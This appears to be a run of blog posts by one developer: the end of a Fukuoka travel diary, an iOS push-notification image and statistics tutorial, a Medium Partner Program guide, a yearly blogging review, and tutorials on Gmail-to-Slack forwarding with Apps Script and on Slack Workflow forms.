Last time I sat in the more expensive infield area, this time I wanted to experience the atmosphere by sitting in the cheapest seats. I thought there were general admission seats, but it turned out to be all reserved seats, so I chose a seat on the last row on the outfield side near the edge for easy access (the chairs on this side of the outfield don’t have backs, the advantage is it’s easier to move in and out).
I can't help but admire Japan's sports culture: a weekday evening game at 18:00, a stadium of roughly 40,000 seats nearly full, and when I was picking seats there were hardly any empty rows, even in the corner sections.
The view and distance were much different compared to last time.
This time, the team was significantly behind, ending with a 9-3 defeat, no fireworks to watch, but I also witnessed the cheering activities of both teams (Fukuoka SoftBank Hawks’ balloon cheering and Tokyo Yakult Swallows’ umbrella dance cheering).
Around the 7th inning with the score already 9-1, people started leaving one after another, and I didn’t see the end either.
The bus stop was crowded as well, and just like last time, I walked back to the subway station with the crowd (about 15 minutes).
Before resting at the hotel, I deliberately took a last look at the night view of Nakasu Yatai in the alley.
Late-night snack, Nissin Donbei tofu noodles (first time trying it after so many days), fruit wine from Oita, and convenience store fried chicken (Juicy and delicious).
Unknowingly, it has been 11 days abroad, and I have started to miss Taiwanese cuisine. There is still plenty of time to wander around before the 21:00 flight.
The main souvenirs have been bought and packed, so today is just about wandering around to find the gachapon machines at the train stations (ultimately didn’t find any, referring to the list of stores provided by the manufacturer, the ones in the city were all sold out).
Early in the morning, I went to Lalaport for a stroll. (Opens at 10 am)
On the first floor, there was a cool drink cabinet converted from a Seibu bus.
The main purpose was to visit the Gachagacha Forest on the third floor and Pon! under the escalator on the first floor to see if they had the capsule toys I was looking for. (They didn’t)
Approaching 11 am and feeling hungry as I hadn’t had breakfast, I had seafood tempura rice bowl at the food street on the third floor to satisfy my hunger (found it too salty).
Then, I went back to the first floor to buy a strawberry daifuku from Rokkasen to refresh myself.
Unable to find the capsule toys I was looking for, I left Lalaport and returned to Hakata Station. Inside 1010 as well, there was no Pon! to be found.
I also couldn’t find the capsule toys area at Hakata Yodobashi.
After the unsuccessful search in Hakata, I went to the Tenjin area to look for capsule toy shops, but still no luck.
Finally giving up, I went to explore Animate and Kiddy Land upstairs (with a wide variety of character goods).
Around 4:00 pm, nearing the end of this trip, I sat at Cafe de Miki to have dessert and coffee for a break.
Around 5:00 pm, I returned to the hotel to pick up my luggage and slowly made my way to Fukuoka Airport. I thought there would be a lot of people on the subway around 5 pm, but it was not crowded at all.
It’s quite a distance from Tenjin Minami to Tenjin, and it takes about 15 minutes to walk with luggage.
Taking the airport line to Fukuoka Airport Station (domestic terminal), I then had to transfer to the airport shuttle bus (free) to the international terminal.
The airport shuttle buses run frequently, about every 5-10 minutes, with a journey of about 10 minutes. After getting off, there is still a walk to the 3F departure hall. If you include the time to get out of the subway station, it will take an additional +30 minutes to reach the international terminal.
Fukuoka Airport is currently under renovation, so it’s a bit chaotic.
I arrived at the airport too early, and the counters were not open yet. The ground staff directed us to do self-check-in at counter 1 and then self-check baggage at counter 2, where they would assist us. We quickly completed the baggage check-in (this time only 17 kg).
Around 6:30 pm, I started waiting for boarding.
The departure lounge at Fukuoka Airport is long and narrow, with a lot of people, very chaotic and crowded. (Not sure if it’s due to ongoing renovations and many flights waiting to take off).
The duty-free shops for luxury goods and cosmetics are quite comprehensive, and the staff speak Chinese; there are also souvenir shops (you can find Fukusaya Nagasaki cakes here). There is only one tobacco and alcohol duty-free shop, so expect to queue, and the food outlets are even more crowded than convenience stores, so be prepared to wait in line.
A special announcement for the previous flight CI129 at 19:10: Please comply with China Airlines’ rule of carrying only one piece of carry-on luggage; if you exceed this, you will need to purchase an additional one (this flight seems fully booked).⚠️
Feeling that the area behind is too noisy and chaotic, I walked towards the north of 501-504, where there are fewer people; there is also a cafe and a fast-food restaurant where you can grab something to eat.
I bought a simple pork cutlet sandwich, a few cans of cola, and peach water to bring back to Taiwan.
Boarding started around 20:30, and in the end the one-carry-on rule was not strictly checked (though I had already packed everything into one bag…); we were scheduled to take off at 21:00 and actually took off at 21:09. The aircraft was an A330-300, which is relatively old.
Goodbye Kyushu, goodbye Japan. The airplane meal was ginger-flavored pork fried noodles, not very impressive, but they served cantaloupe!
Encountering turbulence throughout the flight, we landed smoothly in Taiwan after a bumpy ride, with a delay of nearly 30 minutes, arriving close to 23:00 (scheduled for 22:25).
Worried about missing public transportation, I ran all the way, missed the Airport MRT but luckily caught the shuttle bus in the end; otherwise, I would have had to take an unsafe unlicensed taxi back to Taipei.
Route 1819: the journey to Taipei Main Station takes about 55 minutes, my goodness.
As shown in the image above, if you need to get off at a stop along the way, please inform the driver in advance when loading your luggage; otherwise, all passengers getting off at Taipei Main Station will have their luggage placed together. If you need to get off midway, you won’t be able to access your luggage.⚠️
I averaged around 20,000 steps per day, with the highest reaching 27,000 steps.
I missed capturing the box on the right, which contained shrimp crackers that I found delicious at a department store food street in Hakata Station.
This time, I added four of the Seven Lucky Gods, a mini beer, and a Kachikohsu (dog) Inu Year amulet.
The background newspaper was a gift from Le Labo.
[Japan JR PASS | Kyushu Railway Pass | North Kyushu & South Kyushu & All Kyushu | E-Ticket](https://www.kkday.com/zh-tw/product/3494-jr-kyushu-rail-pass?cid=19365&ud1=d78e0b15a08a){:target=”_blank”}
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Image push notifications, push notification display statistics, pre-processing before push notification display
Regarding the basics of push notification setup and principles; there is a lot of information available online, so it will not be discussed here. This article focuses on how to enable the app to support image push notifications and use new features to achieve more accurate push notification display statistics.
As shown in the image above, the Notification Service Extension allows you to pre-process the push notification after the app receives it, and then display the push notification content.
The official documentation states that when we process the incoming push notification content, the processing time limit is about 30 seconds. If the callback is not made within 30 seconds, the push notification will continue to execute and appear on the user’s phone.
iOS ≥ 10.0
The backend push notification payload needs an added `"mutable-content": 1` field so that the system will execute the Notification Service Extension when the push notification arrives:
```json
{
    "aps": {
        "alert": {
            "title": "New article recommended for you",
            "body": "Check it out now"
        },
        "mutable-content": 1,
        "sound": "default",
        "badge": 0
    }
}
```
Step 1. Xcode -> File -> New -> Target
Step 2. iOS -> Notification Service Extension -> Next
Step 3. Enter Product Name -> Finish
Step 4. Click Activate
Step two, write the push notification content processing program
Find the Product Name/NotificationService.swift file
```swift
import UserNotifications

class NotificationService: UNNotificationServiceExtension {

    var contentHandler: ((UNNotificationContent) -> Void)?
    var bestAttemptContent: UNMutableNotificationContent?

    override func didReceive(_ request: UNNotificationRequest, withContentHandler contentHandler: @escaping (UNNotificationContent) -> Void) {
        self.contentHandler = contentHandler
        bestAttemptContent = (request.content.mutableCopy() as? UNMutableNotificationContent)

        if let bestAttemptContent = bestAttemptContent {
            // Modify the notification content here...
            // Process the push notification content here, e.g. load the image
            bestAttemptContent.title = "\(bestAttemptContent.title) [modified]"

            contentHandler(bestAttemptContent)
        }
    }

    override func serviceExtensionTimeWillExpire() {
        // Called just before the extension will be terminated by the system.
        // Use this as an opportunity to deliver your "best attempt" at modified content,
        // otherwise the original push payload will be used.
        // Time is about to expire: skip the image and just adjust the title/content.
        if let contentHandler = contentHandler, let bestAttemptContent = bestAttemptContent {
            contentHandler(bestAttemptContent)
        }
    }

}
```
As shown in the code above, `NotificationService` has two entry points. The first, `didReceive`, is triggered when a push notification arrives; after processing, you need to call the `contentHandler(bestAttemptContent)` callback to hand the result back to the system.
If that callback is not called within the time limit, the second method, `serviceExtensionTimeWillExpire()`, is triggered on timeout. At that point there is not much you can do beyond some final touches (e.g., simply changing the title or body without loading network data).
Here we assume our payload is as follows:
```json
{
    "aps": {
        "alert": {
            "push_id": "2018001",
            "title": "New Article Recommended for You",
            "body": "Check it out now",
            "image": "https://d2uju15hmm6f78.cloudfront.net/image/2016/12/04/3113/2018/09/28/trim_153813426461775700_450x300.jpg"
        },
        "mutable-content": 1,
        "sound": "default",
        "badge": 0
    }
}
```
“push_id” and “image” are custom fields. The push_id is used to identify the push notification for easier tracking and reporting back to the server; the image is the URL of the image content to be attached to the push notification.
```swift
override func didReceive(_ request: UNNotificationRequest, withContentHandler contentHandler: @escaping (UNNotificationContent) -> Void) {
    self.contentHandler = contentHandler
    bestAttemptContent = (request.content.mutableCopy() as? UNMutableNotificationContent)

    if let bestAttemptContent = bestAttemptContent {

        guard let info = request.content.userInfo["aps"] as? NSDictionary, let alert = info["alert"] as? Dictionary<String, String> else {
            // Push notification content format is not as expected, do not process
            contentHandler(bestAttemptContent)
            return
        }

        // Goal 2:
        // Report to the server that the push notification has been displayed
        if let push_id = alert["push_id"], let url = URL(string: "Display Statistics API URL") {
            var request = URLRequest(url: url, cachePolicy: .reloadIgnoringLocalCacheData, timeoutInterval: 30)
            request.httpMethod = "POST"
            // UserAgent: a custom User-Agent string defined elsewhere in the project
            request.addValue(UserAgent, forHTTPHeaderField: "User-Agent")

            let httpBody = "push_id=\(push_id)"
            request.addValue("application/x-www-form-urlencoded", forHTTPHeaderField: "Content-Type")
            request.httpBody = httpBody.data(using: .utf8)

            let task = URLSession.shared.dataTask(with: request) { (data, response, error) in
                // Fire-and-forget reporting; the response is not used
            }
            DispatchQueue.global().async {
                // Asynchronous processing, ignore the result
                task.resume()
            }
        }

        // Goal 1:
        guard let imageURLString = alert["image"], let imageURL = URL(string: imageURLString) else {
            // If no image is attached, no special processing is needed
            contentHandler(bestAttemptContent)
            return
        }

        let dataTask = URLSession.shared.dataTask(with: imageURL) { (data, response, error) in
            guard let fileURL = NSURL(fileURLWithPath: NSTemporaryDirectory()).appendingPathComponent(imageURL.lastPathComponent) else {
                contentHandler(bestAttemptContent)
                return
            }
            guard (try? data?.write(to: fileURL)) != nil else {
                contentHandler(bestAttemptContent)
                return
            }

            guard let attachment = try? UNNotificationAttachment(identifier: "image", url: fileURL, options: nil) else {
                contentHandler(bestAttemptContent)
                return
            }
            // The above downloads the image to a temporary file and creates a UNNotificationAttachment

            bestAttemptContent.categoryIdentifier = "image"
            bestAttemptContent.attachments = [attachment]
            // Add the image attachment to the push notification

            bestAttemptContent.body = (bestAttemptContent.body == "") ? ("Check it out now") : (bestAttemptContent.body)
            // If the body is empty, use the default content "Check it out now"

            contentHandler(bestAttemptContent)
        }
        dataTask.resume()
    }
}
```
I didn't do anything special in `serviceExtensionTimeWillExpire`, so I won't paste it here; the key part is still the `didReceive` code above.
You can see that when a push notification is received, we first call the API to inform the backend that it has been received and will be displayed, which helps us with push notification statistics in the backend; then, if there is an attached image, we process the image.
The Notification Service Extension's `didReceive` will still be triggered, followed by the AppDelegate's `func application(_ application: UIApplication, didReceiveRemoteNotification userInfo: [AnyHashable: Any], fetchCompletionHandler completionHandler: @escaping (UIBackgroundFetchResult) -> Void)` method.
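As a rough illustration (not code from the original project), a minimal sketch of that AppDelegate callback might look like the following, assuming the same custom `push_id` field used in the payload above:

```swift
func application(_ application: UIApplication,
                 didReceiveRemoteNotification userInfo: [AnyHashable: Any],
                 fetchCompletionHandler completionHandler: @escaping (UIBackgroundFetchResult) -> Void) {
    // The payload arrives here unchanged; the Service Extension's modifications
    // only affect what is displayed, not this userInfo dictionary.
    if let aps = userInfo["aps"] as? [String: Any],
       let alert = aps["alert"] as? [String: String],
       let pushId = alert["push_id"] {
        // Hypothetical handling: log or record the push_id on the app side as well.
        print("Received remote notification with push_id: \(pushId)")
    }
    completionHandler(.noData)
}
```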
Use Notification Content Extension to customize the UIView to be displayed when the push notification is pressed (you can create it yourself), as well as the actions upon pressing.
Refer to this article: iOS10 Advanced Push Notifications (Notification Extension)
iOS 12 and later supports more action handling: iOS 12 New Notification Features: Adding Interactivity and Implementing Complex Functions in Notifications
For the Notification Content Extension part, I only created a UIView to display image push notifications without much elaboration:
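For reference, a minimal sketch of such a Notification Content Extension is shown below. This is my own illustrative reconstruction, not the original article's code; it assumes the `categoryIdentifier = "image"` set in the Service Extension above and a matching `UNNotificationExtensionCategory` value of `image` in the Content Extension's Info.plist:

```swift
import UIKit
import UserNotifications
import UserNotificationsUI

class NotificationViewController: UIViewController, UNNotificationContentExtension {

    private let imageView = UIImageView()

    override func viewDidLoad() {
        super.viewDidLoad()
        imageView.contentMode = .scaleAspectFill
        imageView.clipsToBounds = true
        imageView.frame = view.bounds
        imageView.autoresizingMask = [.flexibleWidth, .flexibleHeight]
        view.addSubview(imageView)
    }

    func didReceive(_ notification: UNNotification) {
        // Show the "image" attachment that the Service Extension downloaded earlier.
        guard let attachment = notification.request.content.attachments.first else { return }
        // Attachment files are security-scoped; access must be requested before reading.
        if attachment.url.startAccessingSecurityScopedResource() {
            imageView.image = UIImage(contentsOfFile: attachment.url.path)
            attachment.url.stopAccessingSecurityScopedResource()
        }
    }
}
```

Long-pressing (or pulling down) the notification then expands it into this custom view showing the downloaded image.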
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Everyone can join the Medium Partner Program to earn revenue by writing articles.
Photo by Steve Johnson
The original intention of running this Medium blog was never to make money, but to enjoy sharing: sharing the technical difficulties I encountered, hoping to give developers facing the same problems a shortcut, while also learning new things myself through the research. In addition, there are few Traditional Chinese writers, and I hoped to inspire others and build a culture of mutual learning.
So I have always been indifferent to whether articles can make a profit. Whether there is profit or not, if there is, I can use the earnings to experiment, purchase more services or experiences, and then rewrite them into articles to share with everyone, creating a rolling cycle.
Since I started writing on Medium in 2018, I have known that Medium had a Partner Program. However, through 2018, 2019, 2020… year after year, the Partner Program policy was never updated and remained limited to writers in a few regions (in Asia, I remember only Singapore and Japan). Writers elsewhere had to resort to troublesome workarounds to earn, such as using a VPN to access an allowed region plus an account or phone number from that region; I briefly looked into this before and found it too cumbersome and unsafe.
As a result, many creators have switched to other platforms, such as Matters, Fangzi, or self-hosted ad revenue, and in recent years, Medium has indeed lost many Chinese creators.
It wasn't until recently, in August 2024, that I happened to see an invitation to join the Partner Program in a banner on Medium's dashboard (my first thought: what, surely Taiwan still isn't eligible?), and after clicking through I was surprised to find that it is now fully open: creators from almost all regions can join the Partner Program and earn revenue from their own articles.
But it’s a bit funny to say that before you can make money by joining the Medium Partner Program, you need to first spend money to join as a Medium Member paid subscriber (minimum $4 USD per month).
List of added countries:
Albania, Algeria, Angola, Antigua and Barbuda, Argentina, Armenia, Australia, Austria, Azerbaijan, Bahamas, Bahrain, Bangladesh, Belgium, Benin, Bhutan, Bolivia, Bosnia and Herzegovina, Botswana, Brunei, Bulgaria, Cambodia, Canada, Chile, Colombia, Costa Rica, Côte d’Ivoire, Croatia, Cyprus, Czech Republic, Denmark, Dominican Republic, Ecuador, Egypt, El Salvador, Estonia, Ethiopia, Finland, France, Gabon, Gambia, Germany, Ghana, Gibraltar, Greece, Guatemala, Guyana, Hong Kong, Hungary, India, Indonesia, Ireland, Israel, Italy, Jamaica, Japan, Jordan, Kazakhstan, Kenya, Kuwait, Laos, Latvia, Liechtenstein, Lithuania, Luxembourg, Macao, Madagascar, Malaysia, Malta, Mauritius, Mexico, Moldova, Monaco, Mongolia, Morocco, Mozambique, Namibia, Netherlands, New Zealand, Niger, Nigeria, North Macedonia, Norway, Oman, Pakistan, Panama, Paraguay, Peru, Philippines, Poland, Portugal, Qatar, Romania, Rwanda, Saint Lucia, San Marino, Saudi Arabia, Senegal, Serbia, Singapore, Slovakia, Slovenia, South Africa, South Korea, Spain, Sri Lanka, Sweden, Switzerland, Taiwan , Tanzania, Thailand, Trinidad and Tobago, Tunisia, Turkey, United Arab Emirates, United Kingdom, United States, Uruguay, Uzbekistan, and Vietnam
Recently, Medium has been adding more and more features. Another feature that was once open and then closed, the Custom Domain feature, has recently been reopened.
Return of Medium Custom Domain Feature
You can refer to my previous article “Return of Medium Custom Domain Feature” to register your own domain and bind it to Medium.
The Custom Domain feature also requires you to join as a Medium Member paid subscriber to use.
The detailed tutorial starts here.
First, make sure you have a Medium Member or Medium Friend membership.
Click “Enroll now” to proceed to the next step.
Add a withdrawal account:
I used a Cathay foreign currency account here; simply look up the foreign currency account details in the bank app and fill them in. (You can change this in the settings later; correctness only seems to be verified when a transfer is actually made.)
After successful submission, you will be redirected back to Medium to continue setting up tax information.
Below is an example for a personal account with no U.S. identity.
Certification (Part III):
After submission, you will be redirected to the Payout settings page. If everything is ✅, it means you have successfully joined!
Note that joining Medium Partner does not automatically generate earnings. The article must be added to Paywall to receive revenue.
This is how this article will generate revenue.
https://medium.com/me/partner/dashboard
Medium Partner Dashboard or Story Stats will show your Earnings.
The detailed article report will also show how many paying members have viewed it.
This article was behind the paywall from the start (it has since been removed); here are the results after one month.
Earnings
Views
Reads
Read ratio
Note that only Reads (paying users staying to read for over 30 seconds) generate revenue. The allocated amount is not fixed and seems to depend on views, claps, shares, etc. My numbers are not high, so each Read is distributed around $0.01 to $0.07.
These data are for reference.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A review of one year on Medium or a summary of 2019
In the blink of an eye, it has been a year since I started publishing articles on Medium. The actual anniversary was 2019/10 (my first article was in 2018/10), but I was too busy and uninspired to write this then. Now that time has rolled into 2020, I’m quickly jotting down my thoughts on a year of running Medium, which also doubles as my 2019 summary!
First, I want to thank Enther Wu and Chih-Hung Yeh for pushing me to start writing again. Initially, my articles were more like daily notes or work reflections, with rather empty content. However, I shamelessly shared them on social media. Looking back at those early articles now, I feel a bit embarrassed and unsure of what I was writing, as the content wasn’t very valuable.
But everything is part of the growth process. The more I wrote, the more I got the hang of it, and the scope of my research broadened. Due to the fear of misleading others, missing details, or misunderstanding something myself, writing articles became more than just recording; it became an in-depth exploration of a particular issue, leading to my own growth and learning. Consequently, the quality of the content I shared with everyone also improved significantly.
The community is really kind-hearted. Initially, I was afraid of being criticized and losing confidence. But that didn’t happen. The feedback I received was very positive, even if the content wasn’t necessarily helpful. This positive encouragement gave me more confidence in my creations and motivated me to spend more time documenting. Thank you all for your encouragement!
The writing experience on Medium is really great. If you are also a developer, you can install Code Medium, a Chrome Extension that allows you to embed beautiful code snippets directly in Medium using Gist!
I wrote about life and technology, so to differentiate, I established two Publication channels: ZRealm Life. for sharing life and unboxing / ZRealm Dev. for sharing work and technical articles, allowing everyone to follow the content they are interested in.
A very “Western-style” touch: a logo. Life needs a sense of ritual, right? Since I’m treating this as something I run, it should have a brand identity, so I asked a designer to help realize my logo concept. My idea: the pentagon frame pays homage to the emblem of my alma mater NTUST, representing craftsmanship and technology; the inner “ZR” stands for the “Z” of ZhongCheng (my romanized Chinese name) and the “R” of Realm, my domain.
Speaking of gains, let me start with my original intention in writing: “Teaching and Learning”. It was never about showing off or making money. None of my articles are behind a paywall, because knowledge shouldn’t be something you have to pay to access; knowledge is power. If you like the platform, please support Medium’s paid membership so that we have a sustainable place to write for the long run (I’m genuinely afraid it won’t withstand the losses).
In terms of gains, apart from monetary benefits, I’ve gained a lot in other aspects. First is the sense of achievement. When someone reads and responds to your article, it gives you a great sense of accomplishment and more motivation to continue writing. Additionally, I’ve met many friends and had more interactions. I’m a passive socializer, and before writing articles, I was very unfamiliar with the community and had almost no interactions. Now, I’ve met many friends and feel I’m not alone on the path of development! (Just like the subtitle of my Publication — “You are not alone on the road to solving problems”).
Since this is a review, it’s customary to share some statistics. In 2019 (including the end of 2018), I published a total of 25 articles: 2 lifestyle, 5 unboxing, and 18 technical articles, accumulating roughly 60,000 views and 5,000 claps, and passing 200 followers!
Thank you all for your support and love. I will continue to work hard this year!
Your follow and feedback are my motivation for writing!
ZhgChgLi, 2020/01/11.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Use Gmail Filter + Google Apps Script to automatically forward customized content to Slack Channel when receiving emails
Photo by Lukas Blazek
Recently, I have been optimizing the CI/CD process for an iOS app, using Fastlane as the automation tool. After packaging and uploading, if you want to continue with the automatic submission step ( skip_submission=false ), you need to wait for Apple to finish processing the build, which eats up about 30-40 minutes of CI server time. Because Apple’s App Store Connect API is not perfect, Fastlane can only poll once per minute to check whether the uploaded build has been processed, which wastes a lot of resources.
No more waiting. End it right after uploading! Use the email notification of completion to trigger subsequent actions.
However, I haven’t received this email recently. I don’t know if it’s a setting issue or if Apple no longer sends this type of notification.
This article will use the email notification that Testflight is ready for testing as an example.
The complete process is shown in the image above. The principle is feasible; however, this is not the focus of this article. This article will focus on receiving emails and using Apps Script to forward them to a Slack Channel.
Whether it’s a paid or free Slack project, different methods can be used to achieve the function of forwarding emails to a Slack Channel or DM.
You can refer to the official documentation for setup: Send Emails to Slack
The effect is the same regardless of the method used:
Default collapsed email content, click to expand and view all content.
Advantages:
Disadvantages:
This is the main focus of this article.
Translate the email content data into the style you want to present, as shown in the example above.
Filters can automate some actions when receiving emails that meet certain conditions, such as automatically marking as read, automatically tagging, automatically moving to spam, automatically categorizing, etc.
In Gmail, click the advanced search icon in the upper right corner and enter the rule conditions for the emails you want to forward, for example from: no_reply@email.apple.com plus a subject containing “is now available to test.”. Click “Search” to check that the filtered results are what you expect; if they are, click the “Create filter” button next to Search.
Or directly click Filter message like these at the top of the email to quickly create filter conditions
This button placement is rather counterintuitive; it took me a while to find it the first time.
Next, set the actions for emails that meet this filter condition. Here we select “Apply the label” to create a separate new recognition label “forward-to-slack”, click “Create filter” to complete.
From then on, all emails marked with this label will be forwarded to Slack.
First, we need to add the Incoming WebHooks App to the Slack Channel, which we will use to send messages.
Select the channel where you want to send the message.
Note down the “Webhook URL” at the top
Scroll down to set the name and avatar of the bot that sends the message; remember to click “Save Settings” after making changes.
Note
Please note that the official recommendation is to use the new Slack APP Bot API’s chat.postMessage to send messages. The simple method of Incoming Webhook will be deprecated in the future. This article uses the simpler method, but it can be adjusted to the new method along with the next chapter “Import Employee List” which requires the Slack App API.
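As a rough, optional sketch of that note (not part of the original tutorial), the same message could be sent through chat.postMessage instead of an Incoming Webhook; the bot token and channel ID below are placeholders you would replace with your own, and the bot needs the chat:write scope plus an invite to the target channel.

function sendMessageToSlackViaAPI(content) {
  // Hypothetical alternative to the webhook version below, using the Slack Web API.
  var payload = {
    "channel": "CXXXXXXXX", // target Channel ID (placeholder)
    "text": "*You have received an email*\n" + content
  };
  UrlFetchApp.fetch('https://slack.com/api/chat.postMessage', {
    method: 'post',
    contentType: 'application/json',
    headers: { 'Authorization': 'Bearer xoxb-your-bot-token' }, // placeholder Bot User OAuth Token
    payload: JSON.stringify(payload)
  });
}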
Paste the following basic script and modify it to your desired version:
function sendMessageToSlack(content) {
  var payload = {
    "text": "*You have received an email*",
    "attachments": [{
      "pretext": "The email content is as follows:",
      "text": content,
    }]
  };
  var res = UrlFetchApp.fetch('Paste your Slack incoming Webhook URL here', {
    method: 'post',
    contentType: 'application/json',
    payload: JSON.stringify(payload)
  });
}

function forwardEmailsToSlack() {
  // Referenced from: https://gist.github.com/andrewmwilson/5cab8367dc63d87d9aa5

  var label = GmailApp.getUserLabelByName('forward-to-slack');
  var messages = [];
  var threads = label.getThreads();

  if (threads == null || threads.length == 0) {
    return;
  }

  for (var i = 0; i < threads.length; i++) {
    messages = messages.concat(threads[i].getMessages());
  }

  for (var i = 0; i < messages.length; i++) {
    var message = messages[i];
    Logger.log(message);

    var output = '*New Email*';
    output += '\n*from:* ' + message.getFrom();
    output += '\n*to:* ' + message.getTo();
    output += '\n*cc:* ' + message.getCc();
    output += '\n*date:* ' + message.getDate();
    output += '\n*subject:* ' + message.getSubject();
    output += '\n*body:* ' + message.getPlainBody();

    sendMessageToSlack(output);
  }

  // Remove the label so the same threads are not forwarded again on the next run
  label.removeFromThreads(threads);
}
Advanced:
Example: Extracting version number information from a Testflight approval email:
Email subject: Your app XXX has been approved for beta testing.
Email content:
We want to get the Bundle Version Short String and the value after Build Number.
// "body" is the plain-text email content, e.g. message.getPlainBody() from forwardEmailsToSlack()
var results = body.match(/(Bundle Version Short String: ){1}(\S+){1}[\S\s]*(Build Number: ){1}(\S+){1}/);
if (results == null || results.length != 5) {
  // not valid
} else {
  var version = results[2]; // value after "Bundle Version Short String:"
  var build = results[4];   // value after "Build Number:"
}
If “Authorization Required” appears, click “Continue” to complete the verification
During the authentication process, “Google hasn’t verified this app” will appear. This is normal because our App Script has not been verified by Google. However, it is fine since this is for personal use.
Click the bottom left “Advanced” -> “Go to ForwardEmailsToSlack (unsafe)”
Click “Allow”
Forwarding successful!!!
In the left menu of Apps Script, select “Triggers”.
Bottom left “+ Add Trigger”.
Choose the function to run: forwardEmailsToSlack.
For demonstration purposes, set it to execute every minute. I think checking emails every hour is sufficient for real-time needs.
Automatic checking & forwarding successful!
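For reference only (this is not one of the original steps), the same time-driven trigger can also be created from code via Apps Script's ScriptApp service; the hourly interval here just mirrors the suggestion above.

function createHourlyTrigger() {
  // Creates an installable time-driven trigger that runs forwardEmailsToSlack once per hour.
  ScriptApp.newTrigger('forwardEmailsToSlack')
    .timeBased()
    .everyHours(1)
    .create();
}

Run it once from the editor and the trigger will appear in the Triggers list.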
With this feature, you can achieve customized email forwarding processing and even use it as a trigger. For example, automatically execute a script when receiving an XXX email.
Returning to the origin in the first chapter, we can use this mechanism to perfect the CI/CD process; no need to wait idly for Apple to complete processing, and it can be linked to the automation process!
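As a hedged sketch of that idea (the webhook URL and subject check below are hypothetical and not something this article sets up), the message loop in forwardEmailsToSlack could also call a helper like this, right next to sendMessageToSlack(output), to kick off the next CI/CD step when the matching email arrives:

function triggerCIIfBuildReady(message) {
  // Hypothetical example: when the TestFlight "ready to test" email arrives,
  // call your CI system's build-trigger webhook in addition to posting to Slack.
  if (message.getSubject().indexOf('is now available to test') === -1) {
    return; // not the email we care about
  }
  UrlFetchApp.fetch('https://your-ci-server.example.com/trigger-release', { // placeholder URL
    method: 'post',
    contentType: 'application/json',
    payload: JSON.stringify({ reason: message.getSubject() })
  });
}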
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Enhancing work efficiency with Slack Workflow combined with Google Sheets and Apps Script
Photo by Stephen Phillips — Hostreviews.co.uk
In response to full remote work, the company cares about the health of all members. Every day, employees need to report their health status, which is recorded and managed by People Operations.
The above is our company’s health reporting tracking process. Each company may have different processes based on their scale and operation methods. This article uses it as an optimization example to learn Slack Workflow usage and basic App Script writing. Actual implementation should be case by case.
Having done quite a few small automation projects, I knew this process was a great candidate for automation: a fixed data source (the employee list), simple conditions, and routine actions. I hadn’t done it earlier because I couldn’t find a good way to handle the form filling (honestly, I couldn’t find an interesting angle to research), so it sat untouched until I saw this post by Hai Zongli and realized that Slack Workflow can not only send scheduled messages but also provide a form feature:
Image from: Hai Zongli
This got me excited!!
A Slack Workflow form combined with message automation could solve all the pain points mentioned above, so the idea was feasible, and I started implementing it.
First, let’s look at the optimized process and results.
(Personal Estimate)
Manage the Sheet by writing App Script.
Use <@UID> in the message content to tag the members who have not filled in the form. The identity linking Google Form and Slack is the email address, so please make sure all colleagues fill out the Google Form with their company email and also set the company email in their Slack profile.
After discussing the issues, optimization methods, and results, let’s move on to the implementation phase; let’s complete this automation case step by step together.
The content is a bit lengthy; you can skip the sections you already understand, or create a copy directly from the finished result and learn by modifying it.
Completed result form: https://forms.gle/aqGDCELpAiMFFoyDA
Completed result Google Sheet:
Steps omitted, please Google if you have any questions. Here, we assume you have already created & linked the health report form.
Remember to check “Collect emails” on the form:
Collect the email addresses of the respondents for future list comparison.
How to link responses to Google Sheet?
Switch to “Responses” at the top of the form and click the “Google Sheet Icon”.
Change the linked Sheet name:
It is recommended to change the linked Sheet name from Form Responses 1 to Responses for easier use.
After having the traditional Google Form entry, let’s add the Slack filling method.
In any Slack conversation window, find the blue lightning bolt ⚡️ below the input box and click it.
In the menu under “Search shortcuts,” type “workflow” and select “Open Workflow Builder.”
Here, it will list the Workflows you have created or participated in. Click “Create” in the upper right corner to create a new Workflow.
Step one, enter the workflow name (for display in the Workflow Builder interface).
Workflow trigger method, select “Shortcut.”
Currently, there are 5 types of Slack workflow trigger points:
Here we choose “Shortcut” to create a manual trigger option.
Select which “Channel input box” this Workflow Shortcut should be added to and enter the “display name.”
*A workflow shortcut can only be added to one channel.
Shortcut created! Start creating workflow steps by clicking “Add Step.”
Select the “Send a form” Step.
Title: Enter the form title.
Add a question: Enter the first question’s title (you can label the question number in the title, e.g., 1., 2., 3…).
Choose a question type:
For “Select from a list”:
You can also choose to send the response to…:
After completing the form, click “Save” to save the step.
*Here we uncheck the option to return the form content because we want to customize the message content in later steps.
If you haven’t added the Google Sheet App to Slack yet, you can click here to install the APP.
Following the previous step, click “Add Step” to add a new step. We choose the “Add a spreadsheet row” step from Google Sheets for Workflow Builder.
Click “Insert Variable” in the lower right corner and select “Response to Question 1…”. After inserting, you can add other columns by clicking “Add Column” in the lower left corner. Repeat this process for Question 2, Question 3, etc.
For the email of the person filling out the form, you can select “Person who submitted form”.
Click on the inserted variable and select “Email” to automatically fill in the email of the person who filled out the form.
<@User ID>
The Timestamp column is a bit tricky; we will supplement the setting method later. First, click “Save” to save, then go back to the top right corner of the page and click “Publish” to publish the Shortcut.
After seeing the success message, you can go back to the Slack Channel and give it a try.
At this point, clicking the lightning bolt will show the Workflow form you just created, which you can click to fill out and play with.
Left: Desktop / Right: Mobile
We can fill in the information and “Submit” to test if it works properly.
Success! But you can see that the Timestamp column is empty. Next, we will solve this problem.
Slack workflow does not have a global variable for the current timestamp, at least not yet. I only found a wish post on Reddit.
Initially, I naively entered =NOW() as the Column Value, but that way the time recorded for every row always shows the current time, which is completely wrong.
Thanks to the Reddit post and the clever workaround shared by a kind netizen: create a clean Timestamp sheet with a single row of data and a column containing =NOW(). First use an Update step to force the sheet to recalculate so the column is current, then use a Select step to read out the current timestamp.
As shown in the structure above, click here to view the example.
The value cell uses =NOW() so it always displays the current time. You can right-click the sheet tab and select “Hide sheet” to hide this sheet, as it is not intended for external use.
Go back to Slack Workflow Builder to edit the workflow form you just created.
Click “Add Step” to add a new step:
Scroll down and select “Update a spreadsheet row”:
